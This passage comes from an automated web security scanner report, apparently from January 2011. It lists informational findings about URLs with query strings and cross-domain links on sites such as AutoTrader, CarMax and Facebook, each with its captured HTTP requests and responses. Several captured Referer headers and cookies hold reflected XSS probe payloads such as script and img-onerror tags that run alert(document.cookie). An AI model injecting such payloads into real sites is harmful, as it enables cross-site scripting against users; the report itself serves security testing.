/redirect/redirector_link.jsp?to_url=http%3A%2F%2Fwww.autotraderclassics.com%2F%3Futm_source%3Datc%26utm_medium%3Dlinks%26utm_content%3Datcsyc%26utm_campaign%3Dpartnership+links&mis=SCNDBDLNTO697"><img src="http://www.autotraderstatic.com/img/standardicons/offsite_icon_off-state_03.gif?v=3.17.167500" /></a>
...[SNIP]...
<a href="http://www.autotrader.com/redirect/redirector_link.jsp?to_url=http%3A%2F%2Fwww.autotraderlatino.com/&mis=SCNDBDLNT01333"><img src="http://www.autotraderstatic.com/img/standardicons/offsite_icon_off-state_03.gif?v=3.17.167500" /></a>
...[SNIP]...
<p><img src="http://www.autotraderstatic.com/img/fsbo/secure.gif?v=3.17.167500" class="secureIcon"><a onmouseout="document.getElementById('safeLinkHoverB').style.display='none'" onmouseover="document.getElementById('safeLinkHoverB').style.display='block'" href="javascript:void(0);">
...[SNIP]...
<NOSCRIPT>
<IMG SRC="http://ad.doubleclick.net/activity;src=991248;type=selly314;cat=fsbol647;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0>
</NOSCRIPT>
...[SNIP]...
<noscript>
<iframe src="https://fls.doubleclick.net/activityi;src=1829700;type=pscou187;cat=place918;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<li><a href="http://autotrader.mediaroom.com/" onclick="return BILogUtil.Redirector(this.href, ['mis=ALLBFTLNPR1248'], false).send();" >Press Room</a>
...[SNIP]...
</iframe>

<script type="text/javascript" src="http://cetrk.com/pages/scripts/0006/4068.js"> </script>
...[SNIP]...

20.563. http://www.autotraderstatic.com/inc/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotraderstatic.com
Path:	/inc/global.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.autotraderstatic.com/inc/global.js?v=3.17.167500

The response contains the following links to other domains:

http://autotrader.com/
http://www.autotrader.com/

Request

GET /inc/global.js?v=3.17.167500 HTTP/1.1
Host: www.autotraderstatic.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: M7F1=CT
If-Modified-Since: Wed, 03 Nov 2010 17:49:34 GMT

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 03 Nov 2010 17:49:34 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Cache-Control: max-age=194472
Expires: Thu, 27 Jan 2011 20:24:52 GMT
Date: Tue, 25 Jan 2011 14:23:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 62326

/**
* Container for BI logging functions
* @author John Napier
*/
var BILogUtil = {
/**
* Build an engine for searching the DOM, capturing reporting code, and associating
* a BILogUti
...[SNIP]...

* "class" or "id" attributes:
*
* == Script ==
* BILogUtil.Engine("mis", ["class", "id"]).automate();
*
* == Links ==
* <a href="http://autotrader.com" class="mis-123423423">Text</a>
* <a href="http://www.autotrader.com" id="mis-98765MIS">Text</a>
...[SNIP]...
st
* the "title" attribute
*
* == Script ==
* BILogUtil.Engine(["mis", "rdpage"], "title").automate();
*
* == Links ==
* <a href="http://www.autotrader.com" title="mis-1234MISCODES rdpage-MyRDPageParam">Text</a>
...[SNIP]...

20.564. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/Content/Forms/Login.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK

The response contains the following link to another domain:

https://com-bmwusa.netmng.com/

Request

Response

20.565. http://www.carmax.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.carmax.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.carmax.com/?adcode=GOOAW500701E&pkw=autotrader&s=0/x22

The response contains the following links to other domains:

http://phx.corporate-ir.net/phoenix.zhtml?c=125417&p=irol-irhome
http://phx.corporate-ir.net/phoenix.zhtml?c=232927&p=irol-overview
http://www.facebook.com/CarMax
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1009281771/?label=D0eOCK2u4AEQ69Wh4QM&guid=ON&script=0
http://www.twitter.com/CarMax
https://epayment.epymtservice.com/epay.jhtml?productCode=AUTHORIZED_PRODUCT&billerId=MAX&billerGroupId=CAR

Request

GET /?adcode=GOOAW500701E&pkw=autotrader&s=0/x22 HTTP/1.1
Host: www.carmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: KMXCOM=UPIJWISKMXCOMWEB032T0x0000000e_0xc6b22d20CMLJW; expires=Mon, 24-Jan-2011 17:04:32 GMT; path=/
Connection: close
Date: Mon, 24 Jan 2011 16:04:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: KmxVisitor_0=VisitorID=4073eb59-f703-43e1-91c2-7e99cee8909d&CookieDate=1/24/2011 11:04:33 AM&AdCode=GOOAW500701E&AdCodeDate=1/24/2011 11:04:33 AM&Zip=; domain=.carmax.com; expires=Tue, 24-Jan-2012 16:04:33 GMT; path=/
Set-Cookie: KmxSession_0=c1b45976-a5a9-48ba-ab1b-54bf37377127; domain=.carmax.com; path=/
Set-Cookie: KmxCurrSession_0=AB=False&StartDate=1/24/2011 11:04:33 AM&IsIntranet=False&IsHomeOffice=False; domain=.carmax.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>
CarMax - Browse used cars and new cars online
...[SNIP]...
<li><a target="_blank" href="https://epayment.epymtservice.com/epay.jhtml?productCode=AUTHORIZED_PRODUCT&billerId=MAX&billerGroupId=CAR">Make a Payment</a>
...[SNIP]...
<li><a onclick="return showpopup(this);" rel="popup 600 960" href="http://www.twitter.com/CarMax"><div class="tw">
...[SNIP]...
<li><a onclick="return showpopup(this);" rel="popup 600 960" href="http://www.facebook.com/CarMax"><div class="fb">
...[SNIP]...
<li><a target="_blank" href="http://phx.corporate-ir.net/phoenix.zhtml?c=125417&p=irol-irhome">Investor Relations</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=232927&p=irol-overview">Pressroom</a>
...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script><noscript><div style="display:inline;"><img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1009281771/?label=D0eOCK2u4AEQ69Wh4QM&guid=ON&script=0"/></div>
...[SNIP]...

20.566. http://www.dynamicdrive.com/forums/showthread.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dynamicdrive.com
Path:	/forums/showthread.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.dynamicdrive.com/forums/showthread.php?t=39177&highlight=smooth

The response contains the following links to other domains:

http://acreativellc.com/newsite/nav.php
http://acreativellc.com/newsite/navA/nav.php
http://del.icio.us/post?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing
http://digg.com/submit?phrase=2&url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing
http://img229.imageshack.us/img229/8436/20081221145133cruw5.png
http://www.atlanticinkjet.com/canon.asp
http://www.big-boards.com/
http://www.crucialp.com/
http://www.eukhost.com/
http://www.flashmint.com/
http://www.google.com/bookmarks/mark?op=edit&output=popup&bkmk=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en
http://www.ozzu.com/
http://www.phpbbhacks.com/
http://www.pixel2life.com/
http://www.satelliteinternetpros.com/
http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing
http://www.windowshostingasp.net/
http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js?v=381
http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js?v=381

Request

GET /forums/showthread.php?t=39177&highlight=smooth HTTP/1.1
Host: www.dynamicdrive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:17 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: bblastvisit=1295913557; expires=Tue, 24-Jan-2012 23:59:17 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Tue, 24-Jan-2012 23:59:17 GMT; path=/
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 82811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...


<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js?v=381"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js?v=381"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<br />
* For example of the problem, see: <a href="http://acreativellc.com/newsite/nav.php" target="_blank">http://acreativellc.com/newsite/nav.php</a>
...[SNIP]...
<br />
* It works fine with one sub-menu arrow, as seen on <a href="http://acreativellc.com/newsite/navA/nav.php" target="_blank">http://acreativellc.com/newsite/navA/nav.php</a>
...[SNIP]...
<br />
If I move cursor down on to one of the dropdown elements and then move the cursor quickly back up, part of the shadow remains painted on the screen. See <a href="http://img229.imageshack.us/img229/8436/20081221145133cruw5.png" target="_blank">http://img229.imageshack.us/img229/8...45133cruw5.png</a>
...[SNIP]...
<li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">

       <a href="http://del.icio.us/post?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark"><img src="images/misc/bookmarksite_delicious.gif" border="0" alt="Submit Thread to del.icio.us" class="inlineimg" /></a>

   <a href="http://del.icio.us/post?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark" style="text-decoration:none">del.icio.us</a>
...[SNIP]...
<li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">

       <a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark"><img src="images/misc/bookmarksite_stumbleupon.gif" border="0" alt="Submit Thread to StumbleUpon" class="inlineimg" /></a>

   <a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark" style="text-decoration:none">StumbleUpon</a>
...[SNIP]...
<li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">

       <a href="http://www.google.com/bookmarks/mark?op=edit&output=popup&bkmk=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark"><img src="images/misc/bookmarksite_google.gif" border="0" alt="Submit Thread to Google" class="inlineimg" /></a>

   <a href="http://www.google.com/bookmarks/mark?op=edit&output=popup&bkmk=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark" style="text-decoration:none">Google</a>
</li><li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">

       <a href="http://digg.com/submit?phrase=2&url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark"><img src="images/misc/bookmarksite_digg.gif" border="0" alt="Submit Thread to Digg" class="inlineimg" /></a>

   <a href="http://digg.com/submit?phrase=2&url=http%3A%2F%2Fwww.dynamicdrive.com%2Fforums%2Fshowthread.php%3Ft%3D39177&title=Smooth+Navigational+Menu%3A+Problem+-+Cannot+have+2+side+arows+under+one+listing" target="socialbookmark" style="text-decoration:none">Digg</a>
...[SNIP]...
<div id="footer" style="font-size: 12px; text-align: center"><a href="http://www.crucialp.com/" target="_partners">Dedicated Hosting</a> |
<a href="http://www.ozzu.com/" target="_partners">Developer Forum</a> | <a href="http://www.eukhost.com/" target="_partners">Website Hosting</a> | <a href="http://www.pixel2life.com/" target="_partners">Pixel2life</a> | <a href="http://www.phpbbhacks.com" target="_partners">phpBBHacks.com</a> | <a href="http://www.atlanticinkjet.com/canon.asp" target="_partners">Canon Inkjet Cartridges</a> | <a href="http://www.big-boards.com/" target="_partners">Forums</a> | <a href="http://www.flashmint.com" target="_partners">Flash Templates</a> | <a href="http://www.windowshostingasp.net/" title="ASP.NET Hosting" target="_partners">ASP.NET Hosting</a> | <a href="http://www.satelliteinternetpros.com" target="_partners">Satellite Internet</a>
...[SNIP]...

20.567. http://www.espatial.com/contact/live-trial-adwords previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.espatial.com
Path:	/contact/live-trial-adwords

Issue detail

The page was loaded from a URL containing a query string:

http://www.espatial.com/contact/live-trial-adwords?utm_source=Google&utm_medium=PPC&kw=erdas%20extensions%20for%20arcgis&utm_campaign=Competitors-Competitor_Companies/

The response contains the following links to other domains:

http://gmpg.org/xfn/11
http://t2.trackalyzer.com/trackalyze.js
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1043883294/?label=NFmCCPie9AEQnsrh8QM&guid=ON&script=0

Request

GET /contact/live-trial-adwords?utm_source=Google&utm_medium=PPC&kw=erdas%20extensions%20for%20arcgis&utm_campaign=Competitors-Competitor_Companies/ HTTP/1.1
Host: www.espatial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.espatial.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31461

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Discover the power of GIS with web delivery | eSpatial GIS USA</title>
<meta name="google-site-verification" content="c-mJZiRXofVWW1EmyqGE83W5hKB3BWiCPKiilXJEPsk" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="stylesheet" type="text/css" media="all" href="http://www.espatial.com/wp-content/themes/espatial/960.css" />
...[SNIP]...
<br />
<script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1043883294/?label=NFmCCPie9AEQnsrh8QM&guid=ON&script=0"/></div>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

20.568. http://www.eyewonderlabs.com/ct.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eyewonderlabs.com
Path:	/ct.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.eyewonderlabs.com/ct.cfm?ewbust=0&file=http://cdn.eyewonder.com/100125/767769/custom/135737/57224923/NOSCRIPTfailover.jpg&eid=57224923&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a99/3/0/%2a/w%3B233959639%3B0-0%3B0%3B57224923%3B2321-160/600%3B40054263/40072050/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Eaopt%3D0/ff/ff/ff%3B%7Efdr%3D234359717%3B0-0%3B1%3B42955348%3B2321-160/600%3B40013631/40031418/1%3B%3B%7Eokv%3D%3Bsz%3D160x600%3Bfmzid%3D2673%3B%3Bfmcls%3DATF%3Btile%3D1%3Bqcseg%3DD%3Bqcseg%3DT%3Bqcseg%3D2891%3Bqcseg%3D2867%3Bqcseg%3D2866%3Bqcseg%3D2865%3Bqcseg%3D2363%3Bqcseg%3D2362%3Bqcseg%3D2355%3Bqcseg%3D2353%3Bqcseg%3D2352%3Bqcseg%3D2349%3Bqcseg%3D2339%3Bqcseg%3D1286%3Bqcseg%3D1160%3Bqcseg%3D1159%3Bqcseg%3D1156%3Bqcseg%3D1149%3Bqcseg%3D1148%3Bqcseg%3D983%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3fhttp://network4g.verizonwireless.com/

The response contains the following link to another domain:

http://ad.doubleclick.net/click;h=v8/3a99/3/0/*/w;233959639;0-0;0;57224923;2321-160/600;40054263/40072050/1;;~okv=;pc=[TPAS_ID];;~aopt=0/ff/ff/ff;~fdr=234359717;0-0;1;42955348;2321-160/600;40013631/40031418/1;;~okv=;sz=160x600;fmzid=2673;;fmcls=ATF;tile=1;qcseg=D;qcseg=T;qcseg=2891;qcseg=2867;qcseg=2866;qcseg=2865;qcseg=2363;qcseg=2362;qcseg=2355;qcseg=2353;qcseg=2352;qcseg=2349;qcseg=2339;qcseg=1286;qcseg=1160;qcseg=1159;qcseg=1156;qcseg=1149;qcseg=1148;qcseg=983;;~aopt=2/0/ff/0;~sscs=?http://network4g.verizonwireless.com/

Request

GET /ct.cfm?ewbust=0&file=http://cdn.eyewonder.com/100125/767769/custom/135737/57224923/NOSCRIPTfailover.jpg&eid=57224923&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a99/3/0/%2a/w%3B233959639%3B0-0%3B0%3B57224923%3B2321-160/600%3B40054263/40072050/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Eaopt%3D0/ff/ff/ff%3B%7Efdr%3D234359717%3B0-0%3B1%3B42955348%3B2321-160/600%3B40013631/40031418/1%3B%3B%7Eokv%3D%3Bsz%3D160x600%3Bfmzid%3D2673%3B%3Bfmcls%3DATF%3Btile%3D1%3Bqcseg%3DD%3Bqcseg%3DT%3Bqcseg%3D2891%3Bqcseg%3D2867%3Bqcseg%3D2866%3Bqcseg%3D2865%3Bqcseg%3D2363%3Bqcseg%3D2362%3Bqcseg%3D2355%3Bqcseg%3D2353%3Bqcseg%3D2352%3Bqcseg%3D2349%3Bqcseg%3D2339%3Bqcseg%3D1286%3Bqcseg%3D1160%3Bqcseg%3D1159%3Bqcseg%3D1156%3Bqcseg%3D1149%3Bqcseg%3D1148%3Bqcseg%3D983%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3fhttp://network4g.verizonwireless.com/ HTTP/1.1
Host: www.eyewonderlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Tue, 25 Jan 2011 13:13:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://ad.doubleclick.net/click;h=v8/3a99/3/0/*/w;233959639;0-0;0;57224923;2321-160/600;40054263/40072050/1;;~okv=;pc=[TPAS_ID];;~aopt=0/ff/ff/ff;~fdr=234359717;0-0;1;42955348;2321-160/600;40013631/40031418/1;;~okv=;sz=160x600;fmzid=2673;;fmcls=ATF;tile=1;qcseg=D;qcseg=T;qcseg=2891;qcseg=2867;qcseg=2866;qcseg=2865;qcseg=2363;qcseg=2362;qcseg=2355;qcseg=2353;qcseg=2352;qcseg=2349;qcseg=2339;qcseg=1286;qcseg=1160;qcseg=1159;qcseg=1156;qcseg=1149;qcseg=1148;qcseg=983;;~aopt=2/0/ff/0;~sscs=?http://network4g.verizonwireless.com/
Cache-Control: private
Content-Type: text/html

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://ad.doubleclick.net/click;h=v8/3a99/3/0/*/w;233959639;0-0;0;57224923;2321-160/600;40054263/40072050/1;;~okv=;pc=[TPAS_ID];;~aopt=0/ff/ff/ff;~fdr=234359717;0-0;1;42955348;2321-160/600;40013631/40031418/1;;~okv=;sz=160x600;fmzid=2673;;fmcls=ATF;tile=1;qcseg=D;qcseg=T;qcseg=2891;qcseg=2867;qcseg=2866;qcseg=2865;qcseg=2363;qcseg=2362;qcseg=2355;qcseg=2353;qcseg=2352;qcseg=2349;qcseg=2339;qcseg=1286;qcseg=1160;qcseg=1159;qcseg=1156;qcseg=1149;qcseg=1148;qcseg=983;;~aopt=2/0/ff/0;~sscs=?http://network4g.verizonwireless.com/">here</a>
...[SNIP]...

20.569. http://www.facebook.com/apps/application.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/apps/application.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/apps/application.php?id=62945690879

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yP/r/8xr7FhyZNob.css
http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css
http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css
http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js
http://static.ak.fbcdn.net/rsrc.php/yi/r/oPbBLZNMjVJ.css
http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=-yM75; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:18 GMT
Content-Length: 154403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/oPbBLZNMjVJ.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yP/r/8xr7FhyZNob.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="alternate" type="application/rss+xml" title="Star Scene | The Daily Star | Lebanon" href="/feeds/page.php?format=atom10&id=62945690879"/>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

20.570. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/connect/connect.php?%20id=62945690879&connections=10&stream=

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif
http://b.static.ak.fbcdn.net/rsrc.php/ys/r/IlU90aRP2xg.css
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1286.snc4/173660_836605415_3845318_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173827_767025706_4593919_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1311.snc4/173912_556975239_6818246_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161579_1626860566_3084878_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1325.snc4/161584_1593614738_4300580_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1344.snc4/161497_688924697_7167805_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1345.snc4/161576_678745082_6012654_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs226.ash2/49138_697780598_7479716_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs329.snc4/41538_100000492372876_631497_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs464.snc4/50287_62945690879_7080493_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs719.ash1/161585_100001158781561_3653594_q.jpg
http://static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js
http://static.ak.fbcdn.net/rsrc.php/yV/r/R3HqmS9o_VJ.css

Request

GET /connect/connect.php?%20id=62945690879&connections=10&stream= HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x590

Response

20.571. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/connect/connect.php?+id=62945690879&connections=10&stream

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://b.static.ak.fbcdn.net/rsrc.php/yo/r/UlIqmHJn-SK.gif
http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css
